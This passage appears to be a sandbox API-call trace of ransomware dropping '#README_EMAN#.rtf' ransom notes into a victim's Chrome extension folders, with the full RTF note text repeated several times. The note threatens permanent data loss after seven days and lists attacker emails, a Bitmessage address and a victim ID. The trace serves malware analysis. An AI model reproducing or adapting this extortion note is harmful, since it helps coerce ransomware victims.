w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.321] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2373dc8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x83\x19", lpUsedDefaultChar=0x0) returned 8717 [0289.321] WriteFile (in: hFile=0x2e8, lpBuffer=0x2373dc8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2373dc8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.322] CloseHandle (hObject=0x2e8) returned 1 [0289.322] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\#readme_eman#.rtf")) returned 0xffffffff [0289.322] GetLastError () returned 0x2 [0289.322] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.323] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in 